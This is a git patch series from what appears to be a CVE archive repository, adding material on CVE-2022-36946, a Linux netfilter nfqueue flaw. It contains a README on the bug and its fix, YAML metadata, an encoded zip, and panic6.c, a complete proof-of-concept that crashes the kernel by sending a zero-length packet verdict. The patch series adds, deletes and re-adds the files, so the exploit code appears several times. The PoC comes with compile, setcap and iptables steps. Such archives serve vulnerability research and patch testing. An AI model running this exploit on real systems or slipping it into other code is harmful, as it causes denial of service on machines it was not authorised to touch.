From 0a867153a7ea01ca9c84dc24faf02a02a66d4290 Mon Sep 17 00:00:00 2001 From: liuxiaoxinxinxin Date: Fri, 10 Mar 2023 06:50:40 +0000 Subject: [PATCH 01/14] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2022-36946?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2022/CVE-2022-36946/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2022/CVE-2022-36946/.keep diff --git a/cve/linux-kernel/2022/CVE-2022-36946/.keep b/cve/linux-kernel/2022/CVE-2022-36946/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 31748318ab3c93e52b98668e560684e392776abe Mon Sep 17 00:00:00 2001 From: liuxiaoxinxinxin Date: Fri, 10 Mar 2023 06:57:05 +0000 Subject: [PATCH 02/14] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-36946?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: liuxiaoxinxinxin --- .../2022/CVE-2022-36946/CVE-2022-36946-main.zip | Bin 0 -> 2597 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2022/CVE-2022-36946/CVE-2022-36946-main.zip diff --git a/cve/linux-kernel/2022/CVE-2022-36946/CVE-2022-36946-main.zip b/cve/linux-kernel/2022/CVE-2022-36946/CVE-2022-36946-main.zip new file mode 100644 index 0000000000000000000000000000000000000000..9589c9f2276435acb3bfb69e4d94df2ed633778f GIT binary patch literal 2597 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 literal 0 HcmV?d00001 -- Gitee From 57411a42039da44de0ac3e98a64abf02c5e2bff6 Mon Sep 17 00:00:00 2001 From: liuxiaoxinxinxin Date: Fri, 10 Mar 2023 07:00:22 +0000 Subject: [PATCH 03/14] README.md Signed-off-by: liuxiaoxinxinxin --- .../2022/CVE-2022-36946/README.md | 39 +++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 cve/linux-kernel/2022/CVE-2022-36946/README.md diff --git a/cve/linux-kernel/2022/CVE-2022-36946/README.md b/cve/linux-kernel/2022/CVE-2022-36946/README.md new file mode 100644 index 00000000..9bb679ab --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-36946/README.md @@ -0,0 +1,39 @@ +# CVE-2022-36946 + +Reported-by: Domingo Dirutigliano and Nicola Guerrera + +While we were working on [firegex](https://github.com/Pwnzer0tt1/firegex), our application firewall for CTF Attack-Defence competitions, we stumbled upon a few kernel panics. + +This strange behavour was than isolated and anlayzed, leading to the dicovery of this potential security flaw in the netfilter module, specifically with nfnetlink. + +# How does it work? + +The kernel panics when sending nf\_queue verdict with 0-byte nfta\_payload attribute. + +``` +nlh = nfq_nlmsg_put(buf, NFQNL_MSG_VERDICT, queue_num); +nfq_nlmsg_verdict_put_pkt(nlh, NULL, 0); +nfq_nlmsg_verdict_put(nlh, 1, NF_ACCEPT ); +``` + +This happens because the IP/IPv6 stack pulls the IP(v6) header from the packet after the input hook. + +So, if user truncates the packet below the header size, this skb\_pull() will result in a malformed skb resulting in a panic. + +Try it executing [this](/panic6.c) c source code. + +# Fix up + +Fixed in linux kernel 5.19 [view diff](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/diff/net/netfilter/nfnetlink_queue.c?id=v5.19&id2=v5.18) + +Original patch by the linux kernel security team [here](https://marc.info/?l=netfilter-devel&m=165883202007292&w=2) + +# Requirements for exploiting this vuln: + +- A vulnerable linux kernel +- CAP\_NET\_ADMIN capability + + +# Why panic6? + +It worked at the 6th attempt, so we kept the name. -- Gitee From 3d4013fb3105931b77a613d09b9ff725a95e7b9a Mon Sep 17 00:00:00 2001 From: liuxiaoxinxinxin Date: Fri, 10 Mar 2023 07:13:00 +0000 Subject: [PATCH 04/14] add cve/linux-kernel/2022/yaml/ CVE-2022-36946. Signed-off-by: liuxiaoxinxinxin --- cve/linux-kernel/2022/yaml/ CVE-2022-36946 | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 cve/linux-kernel/2022/yaml/ CVE-2022-36946 diff --git a/cve/linux-kernel/2022/yaml/ CVE-2022-36946 b/cve/linux-kernel/2022/yaml/ CVE-2022-36946 new file mode 100644 index 00000000..50c36934 --- /dev/null +++ b/cve/linux-kernel/2022/yaml/ CVE-2022-36946 @@ -0,0 +1,20 @@ +id: +CVE-2022-36946 +source: https://github.com/Pwnzer0tt1/CVE-2022-36946 +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: 高危 + description: | + Linux 内核中 net/netfilter/nfnetlink_queue.c 到 5.18.14 中的nfqnl_mangle允许远程攻击者造成拒绝服务 (panic),因为在具有单字节nfta_payload属性的nf_queue判定的情况下,skb_pull可能会遇到负的 skb->len。 + scope-of-influence: + 5.18.14 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-36946 + - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=722d94847de29310e8aa03fcbdb41fc92c521756 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36946 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.5 + cve-id: CVE-2022-36946 + cwe-id: CWE-190 + tags: 权限提升,容器逃逸,cve2022 \ No newline at end of file -- Gitee From 210d495cc3e507bb9cdbce200593234410252cc8 Mon Sep 17 00:00:00 2001 From: liuxiaoxinxinxin Date: Fri, 10 Mar 2023 07:14:37 +0000 Subject: [PATCH 05/14] rename Signed-off-by: liuxiaoxinxinxin --- .../2022/yaml/{ CVE-2022-36946 => CVE-2022-36946.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cve/linux-kernel/2022/yaml/{ CVE-2022-36946 => CVE-2022-36946.yaml} (100%) diff --git a/cve/linux-kernel/2022/yaml/ CVE-2022-36946 b/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml similarity index 100% rename from cve/linux-kernel/2022/yaml/ CVE-2022-36946 rename to cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml -- Gitee From e1beb117d04c9bfbea726f8f6df32a6533e10324 Mon Sep 17 00:00:00 2001 From: liuxiaoxinxinxin Date: Fri, 10 Mar 2023 07:16:12 +0000 Subject: [PATCH 06/14] firstcommit Signed-off-by: liuxiaoxinxinxin --- cve/linux-kernel/2022/CVE-2022-36946/panic6.c | 104 ++++++++++++++++++ 1 file changed, 104 insertions(+) create mode 100644 cve/linux-kernel/2022/CVE-2022-36946/panic6.c diff --git a/cve/linux-kernel/2022/CVE-2022-36946/panic6.c b/cve/linux-kernel/2022/CVE-2022-36946/panic6.c new file mode 100644 index 00000000..754d8409 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-36946/panic6.c @@ -0,0 +1,104 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +//How to compile: +//cc panic6.c -o nfpanic -lmnl -lnetfilter_queue && sudo setcap "CAP_NET_ADMIN+ep" ./nfpanic && ./nfpanic + +int socket_conn(uint16_t port) +{ + int sockfd, connfd; + struct sockaddr_in servaddr, cli; + + // socket create and verification + sockfd = socket(AF_INET, SOCK_STREAM | SOCK_NONBLOCK, 0); + if (sockfd == -1) { + perror("socket creation failed"); + exit(EXIT_FAILURE); + } + bzero(&servaddr, sizeof(servaddr)); + + // assign IP, PORT + servaddr.sin_family = AF_INET; + servaddr.sin_addr.s_addr = inet_addr("127.0.0.1"); + servaddr.sin_port = htons(port); + + // connect the client socket to server socket + connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)); +} + +int main(int argc, char *argv[]) +{ + size_t BUF_SIZE = 0xffff+(MNL_SOCKET_BUFFER_SIZE/2); + char buf[BUF_SIZE]; + uint16_t queue_num = 1337; + struct nlmsghdr *nlh; + + puts("[*] Creating the socket with the kernel"); + struct mnl_socket* nl = mnl_socket_open(NETLINK_NETFILTER); + if (nl == NULL) { + perror( "mnl_socket_open" ); + exit(EXIT_FAILURE); + } + puts("[*] Binding the socket"); + if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) { + perror( "mnl_socket_bind" ); + exit(EXIT_FAILURE); + } + + printf("[*] Sending the BIND command for the nfqueue %d\n",queue_num); + nlh = nfq_nlmsg_put(buf, NFQNL_MSG_CONFIG, queue_num); + nfq_nlmsg_cfg_put_cmd(nlh, AF_INET, NFQNL_CFG_CMD_BIND); + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) { + perror( "mnl_socket_send" ); + exit(EXIT_FAILURE); + } + + puts("[*] Setting config to COPY_META mode"); + nlh = nfq_nlmsg_put(buf, NFQNL_MSG_CONFIG, queue_num); + nfq_nlmsg_cfg_put_params(nlh, NFQNL_COPY_META, 0xffff); + mnl_attr_put_u32(nlh, NFQA_CFG_FLAGS, htonl(NFQA_CFG_F_GSO)); + mnl_attr_put_u32(nlh, NFQA_CFG_MASK, htonl(NFQA_CFG_F_GSO)); + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) { + perror( "mnl_socket_send" ); + exit(EXIT_FAILURE); + } + + printf("[*] You need to associate to this queue the port 1337: sudo iptables -t mangle -A PREROUTING -j NFQUEUE -p tcp --dport 1337 --queue-num %d\n", queue_num); + puts("Press ENTER to contiune (and panic)"); + getchar(); + + puts("[*] Sending a connection packet to nfqueue"); + socket_conn(1337); + + + puts("[*] Waiting for a packet in the nfqueue"); + if (mnl_socket_recvfrom(nl, buf, BUF_SIZE) == -1) { + perror( "mnl_socket_recvfrom" ); + exit(EXIT_FAILURE); + } + + puts("[*] Sending the verdict with a NULL pointer and len = 0"); + nlh = nfq_nlmsg_put(buf, NFQNL_MSG_VERDICT, queue_num); + nfq_nlmsg_verdict_put_pkt(nlh, NULL, 0); + nfq_nlmsg_verdict_put(nlh, 1, NF_ACCEPT ); + + puts("[*] Sending the verdict to the kernel, Good panic :D"); + sleep(1); //Only to see the print + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) { + perror( "mnl_socket_send" ); + exit(EXIT_FAILURE); + } + puts("[*] Are you still alive?"); + +} + + -- Gitee From f42e5e61aad61b6d1f3a5457d1cf57d030bcb511 Mon Sep 17 00:00:00 2001 From: liuxiaoxinxinxin Date: Fri, 10 Mar 2023 07:17:15 +0000 Subject: [PATCH 07/14] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/linux-kernel/2022/CVE-2022-36946/README.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2022/CVE-2022-36946/README.md | 39 ------------------- 1 file changed, 39 deletions(-) delete mode 100644 cve/linux-kernel/2022/CVE-2022-36946/README.md diff --git a/cve/linux-kernel/2022/CVE-2022-36946/README.md b/cve/linux-kernel/2022/CVE-2022-36946/README.md deleted file mode 100644 index 9bb679ab..00000000 --- a/cve/linux-kernel/2022/CVE-2022-36946/README.md +++ /dev/null @@ -1,39 +0,0 @@ -# CVE-2022-36946 - -Reported-by: Domingo Dirutigliano and Nicola Guerrera - -While we were working on [firegex](https://github.com/Pwnzer0tt1/firegex), our application firewall for CTF Attack-Defence competitions, we stumbled upon a few kernel panics. - -This strange behavour was than isolated and anlayzed, leading to the dicovery of this potential security flaw in the netfilter module, specifically with nfnetlink. - -# How does it work? - -The kernel panics when sending nf\_queue verdict with 0-byte nfta\_payload attribute. - -``` -nlh = nfq_nlmsg_put(buf, NFQNL_MSG_VERDICT, queue_num); -nfq_nlmsg_verdict_put_pkt(nlh, NULL, 0); -nfq_nlmsg_verdict_put(nlh, 1, NF_ACCEPT ); -``` - -This happens because the IP/IPv6 stack pulls the IP(v6) header from the packet after the input hook. - -So, if user truncates the packet below the header size, this skb\_pull() will result in a malformed skb resulting in a panic. - -Try it executing [this](/panic6.c) c source code. - -# Fix up - -Fixed in linux kernel 5.19 [view diff](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/diff/net/netfilter/nfnetlink_queue.c?id=v5.19&id2=v5.18) - -Original patch by the linux kernel security team [here](https://marc.info/?l=netfilter-devel&m=165883202007292&w=2) - -# Requirements for exploiting this vuln: - -- A vulnerable linux kernel -- CAP\_NET\_ADMIN capability - - -# Why panic6? - -It worked at the 6th attempt, so we kept the name. -- Gitee From 4b908c76c10828254dfd8ee14c11bf0b283db3b9 Mon Sep 17 00:00:00 2001 From: liuxiaoxinxinxin Date: Fri, 10 Mar 2023 07:17:21 +0000 Subject: [PATCH 08/14] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/linux-kernel/2022/CVE-2022-36946/panic6.c?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2022/CVE-2022-36946/panic6.c | 104 ------------------ 1 file changed, 104 deletions(-) delete mode 100644 cve/linux-kernel/2022/CVE-2022-36946/panic6.c diff --git a/cve/linux-kernel/2022/CVE-2022-36946/panic6.c b/cve/linux-kernel/2022/CVE-2022-36946/panic6.c deleted file mode 100644 index 754d8409..00000000 --- a/cve/linux-kernel/2022/CVE-2022-36946/panic6.c +++ /dev/null @@ -1,104 +0,0 @@ -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -//How to compile: -//cc panic6.c -o nfpanic -lmnl -lnetfilter_queue && sudo setcap "CAP_NET_ADMIN+ep" ./nfpanic && ./nfpanic - -int socket_conn(uint16_t port) -{ - int sockfd, connfd; - struct sockaddr_in servaddr, cli; - - // socket create and verification - sockfd = socket(AF_INET, SOCK_STREAM | SOCK_NONBLOCK, 0); - if (sockfd == -1) { - perror("socket creation failed"); - exit(EXIT_FAILURE); - } - bzero(&servaddr, sizeof(servaddr)); - - // assign IP, PORT - servaddr.sin_family = AF_INET; - servaddr.sin_addr.s_addr = inet_addr("127.0.0.1"); - servaddr.sin_port = htons(port); - - // connect the client socket to server socket - connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)); -} - -int main(int argc, char *argv[]) -{ - size_t BUF_SIZE = 0xffff+(MNL_SOCKET_BUFFER_SIZE/2); - char buf[BUF_SIZE]; - uint16_t queue_num = 1337; - struct nlmsghdr *nlh; - - puts("[*] Creating the socket with the kernel"); - struct mnl_socket* nl = mnl_socket_open(NETLINK_NETFILTER); - if (nl == NULL) { - perror( "mnl_socket_open" ); - exit(EXIT_FAILURE); - } - puts("[*] Binding the socket"); - if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) { - perror( "mnl_socket_bind" ); - exit(EXIT_FAILURE); - } - - printf("[*] Sending the BIND command for the nfqueue %d\n",queue_num); - nlh = nfq_nlmsg_put(buf, NFQNL_MSG_CONFIG, queue_num); - nfq_nlmsg_cfg_put_cmd(nlh, AF_INET, NFQNL_CFG_CMD_BIND); - if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) { - perror( "mnl_socket_send" ); - exit(EXIT_FAILURE); - } - - puts("[*] Setting config to COPY_META mode"); - nlh = nfq_nlmsg_put(buf, NFQNL_MSG_CONFIG, queue_num); - nfq_nlmsg_cfg_put_params(nlh, NFQNL_COPY_META, 0xffff); - mnl_attr_put_u32(nlh, NFQA_CFG_FLAGS, htonl(NFQA_CFG_F_GSO)); - mnl_attr_put_u32(nlh, NFQA_CFG_MASK, htonl(NFQA_CFG_F_GSO)); - if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) { - perror( "mnl_socket_send" ); - exit(EXIT_FAILURE); - } - - printf("[*] You need to associate to this queue the port 1337: sudo iptables -t mangle -A PREROUTING -j NFQUEUE -p tcp --dport 1337 --queue-num %d\n", queue_num); - puts("Press ENTER to contiune (and panic)"); - getchar(); - - puts("[*] Sending a connection packet to nfqueue"); - socket_conn(1337); - - - puts("[*] Waiting for a packet in the nfqueue"); - if (mnl_socket_recvfrom(nl, buf, BUF_SIZE) == -1) { - perror( "mnl_socket_recvfrom" ); - exit(EXIT_FAILURE); - } - - puts("[*] Sending the verdict with a NULL pointer and len = 0"); - nlh = nfq_nlmsg_put(buf, NFQNL_MSG_VERDICT, queue_num); - nfq_nlmsg_verdict_put_pkt(nlh, NULL, 0); - nfq_nlmsg_verdict_put(nlh, 1, NF_ACCEPT ); - - puts("[*] Sending the verdict to the kernel, Good panic :D"); - sleep(1); //Only to see the print - if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) { - perror( "mnl_socket_send" ); - exit(EXIT_FAILURE); - } - puts("[*] Are you still alive?"); - -} - - -- Gitee From 2122fe699364c4b58a991c1cfe108c94d6fcdeac Mon Sep 17 00:00:00 2001 From: liuxiaoxinxinxin Date: Fri, 10 Mar 2023 07:17:39 +0000 Subject: [PATCH 09/14] first commit Signed-off-by: liuxiaoxinxinxin --- .../2022/CVE-2022-36946/README.md | 39 +++++++ cve/linux-kernel/2022/CVE-2022-36946/panic6.c | 104 ++++++++++++++++++ 2 files changed, 143 insertions(+) create mode 100644 cve/linux-kernel/2022/CVE-2022-36946/README.md create mode 100644 cve/linux-kernel/2022/CVE-2022-36946/panic6.c diff --git a/cve/linux-kernel/2022/CVE-2022-36946/README.md b/cve/linux-kernel/2022/CVE-2022-36946/README.md new file mode 100644 index 00000000..9bb679ab --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-36946/README.md @@ -0,0 +1,39 @@ +# CVE-2022-36946 + +Reported-by: Domingo Dirutigliano and Nicola Guerrera + +While we were working on [firegex](https://github.com/Pwnzer0tt1/firegex), our application firewall for CTF Attack-Defence competitions, we stumbled upon a few kernel panics. + +This strange behavour was than isolated and anlayzed, leading to the dicovery of this potential security flaw in the netfilter module, specifically with nfnetlink. + +# How does it work? + +The kernel panics when sending nf\_queue verdict with 0-byte nfta\_payload attribute. + +``` +nlh = nfq_nlmsg_put(buf, NFQNL_MSG_VERDICT, queue_num); +nfq_nlmsg_verdict_put_pkt(nlh, NULL, 0); +nfq_nlmsg_verdict_put(nlh, 1, NF_ACCEPT ); +``` + +This happens because the IP/IPv6 stack pulls the IP(v6) header from the packet after the input hook. + +So, if user truncates the packet below the header size, this skb\_pull() will result in a malformed skb resulting in a panic. + +Try it executing [this](/panic6.c) c source code. + +# Fix up + +Fixed in linux kernel 5.19 [view diff](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/diff/net/netfilter/nfnetlink_queue.c?id=v5.19&id2=v5.18) + +Original patch by the linux kernel security team [here](https://marc.info/?l=netfilter-devel&m=165883202007292&w=2) + +# Requirements for exploiting this vuln: + +- A vulnerable linux kernel +- CAP\_NET\_ADMIN capability + + +# Why panic6? + +It worked at the 6th attempt, so we kept the name. diff --git a/cve/linux-kernel/2022/CVE-2022-36946/panic6.c b/cve/linux-kernel/2022/CVE-2022-36946/panic6.c new file mode 100644 index 00000000..754d8409 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-36946/panic6.c @@ -0,0 +1,104 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +//How to compile: +//cc panic6.c -o nfpanic -lmnl -lnetfilter_queue && sudo setcap "CAP_NET_ADMIN+ep" ./nfpanic && ./nfpanic + +int socket_conn(uint16_t port) +{ + int sockfd, connfd; + struct sockaddr_in servaddr, cli; + + // socket create and verification + sockfd = socket(AF_INET, SOCK_STREAM | SOCK_NONBLOCK, 0); + if (sockfd == -1) { + perror("socket creation failed"); + exit(EXIT_FAILURE); + } + bzero(&servaddr, sizeof(servaddr)); + + // assign IP, PORT + servaddr.sin_family = AF_INET; + servaddr.sin_addr.s_addr = inet_addr("127.0.0.1"); + servaddr.sin_port = htons(port); + + // connect the client socket to server socket + connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)); +} + +int main(int argc, char *argv[]) +{ + size_t BUF_SIZE = 0xffff+(MNL_SOCKET_BUFFER_SIZE/2); + char buf[BUF_SIZE]; + uint16_t queue_num = 1337; + struct nlmsghdr *nlh; + + puts("[*] Creating the socket with the kernel"); + struct mnl_socket* nl = mnl_socket_open(NETLINK_NETFILTER); + if (nl == NULL) { + perror( "mnl_socket_open" ); + exit(EXIT_FAILURE); + } + puts("[*] Binding the socket"); + if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) { + perror( "mnl_socket_bind" ); + exit(EXIT_FAILURE); + } + + printf("[*] Sending the BIND command for the nfqueue %d\n",queue_num); + nlh = nfq_nlmsg_put(buf, NFQNL_MSG_CONFIG, queue_num); + nfq_nlmsg_cfg_put_cmd(nlh, AF_INET, NFQNL_CFG_CMD_BIND); + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) { + perror( "mnl_socket_send" ); + exit(EXIT_FAILURE); + } + + puts("[*] Setting config to COPY_META mode"); + nlh = nfq_nlmsg_put(buf, NFQNL_MSG_CONFIG, queue_num); + nfq_nlmsg_cfg_put_params(nlh, NFQNL_COPY_META, 0xffff); + mnl_attr_put_u32(nlh, NFQA_CFG_FLAGS, htonl(NFQA_CFG_F_GSO)); + mnl_attr_put_u32(nlh, NFQA_CFG_MASK, htonl(NFQA_CFG_F_GSO)); + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) { + perror( "mnl_socket_send" ); + exit(EXIT_FAILURE); + } + + printf("[*] You need to associate to this queue the port 1337: sudo iptables -t mangle -A PREROUTING -j NFQUEUE -p tcp --dport 1337 --queue-num %d\n", queue_num); + puts("Press ENTER to contiune (and panic)"); + getchar(); + + puts("[*] Sending a connection packet to nfqueue"); + socket_conn(1337); + + + puts("[*] Waiting for a packet in the nfqueue"); + if (mnl_socket_recvfrom(nl, buf, BUF_SIZE) == -1) { + perror( "mnl_socket_recvfrom" ); + exit(EXIT_FAILURE); + } + + puts("[*] Sending the verdict with a NULL pointer and len = 0"); + nlh = nfq_nlmsg_put(buf, NFQNL_MSG_VERDICT, queue_num); + nfq_nlmsg_verdict_put_pkt(nlh, NULL, 0); + nfq_nlmsg_verdict_put(nlh, 1, NF_ACCEPT ); + + puts("[*] Sending the verdict to the kernel, Good panic :D"); + sleep(1); //Only to see the print + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) { + perror( "mnl_socket_send" ); + exit(EXIT_FAILURE); + } + puts("[*] Are you still alive?"); + +} + + -- Gitee From 3215032cca9b0729e0cac9261cce7295025bbd88 Mon Sep 17 00:00:00 2001 From: liuxiaoxinxinxin Date: Fri, 10 Mar 2023 07:17:48 +0000 Subject: [PATCH 10/14] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/linux-kernel/2022/CVE-2022-36946/CVE-2022-36946-main.zip?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2022/CVE-2022-36946/CVE-2022-36946-main.zip | Bin 2597 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/linux-kernel/2022/CVE-2022-36946/CVE-2022-36946-main.zip diff --git a/cve/linux-kernel/2022/CVE-2022-36946/CVE-2022-36946-main.zip b/cve/linux-kernel/2022/CVE-2022-36946/CVE-2022-36946-main.zip deleted file mode 100644 index 9589c9f2276435acb3bfb69e4d94df2ed633778f..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 2597 zcmai$cT^K*7l$JxjJU#{5=Dd{1QHUK0xDr85Q)r2ED#77KvqOR#IhA5TQ(9C0m~Lc z7?H}*3fd?rC@TyR4F=hYj5w-ozxI4z+w;BeIrn}4`90_UbMJWw_M$*A;M<8Z2D|?D z`J>1JBmo#VYq$ZzzyOXiGDRD~gGm7)`mQb@z?K2dJ0HRyQHkH8#M|`u--`kONgx1V z*S|!atdCgXt@VP*e=^Rvd>=ZBgPdQxsaWL%lpaoQ9@CJcK{Vh_IF5G9dAt25gENiW}S3Q??wv{sVP`ByGJm3=6)c=-;FBU1c%1 zE)g`;yHfYUVZS#kUal|CdufC@SV@%qRNH!(^2v4pS`qb10(Tel&@g0qsm7hiE3DBN zp?Yw1dtFOwJvI_!$n$5ZiL2s_t73!b#FbMg&(uYUiXBHR(=nSNQJwBPkdm zDgRup(z{Do(CKt_?fr$)eAB$^Mm%1nZh8U=63oC(L&BRL}IqY|fM7U#9jSEgzeQ>$Ee(N!#&Ah*pC zp}3wl(gnAHjB^)#v5#=dAW#b%P5Hc7z}&6&@t$_Wl)jZGV{Fbq87BAS?Lay9hH|>h zpmQ(7KheeGN`^!vD>^3;*`UC-1FQeAe7IPWFAm*s*OyGiUR~QGj@jH6sE>e6=R@sY z9J88~rHkbFk4+u&i%sj(pCa{PH$nPbW1d1(;dg@I{#IS&*;3$4IV#%0CvO6Etgu&F zs0D@X3D>-7aMbhuC|0lc=2_&p@YTtm6fb%ye1dJ>*vPl%gM!|HS-yp@OA@`-?yJ{K zF|VUm+TIik%=j#qhfRg;{!sZ=+i*9>J}s!e-o${MO8RGIuZ+G?LF=MzL}p(`hAmzv z;O=TCX0Pndy*tL{OS9aMp_7U0*n+f$?vmRNjIPx|2cAFXBTM1!dhS_`7yM2T>arbI 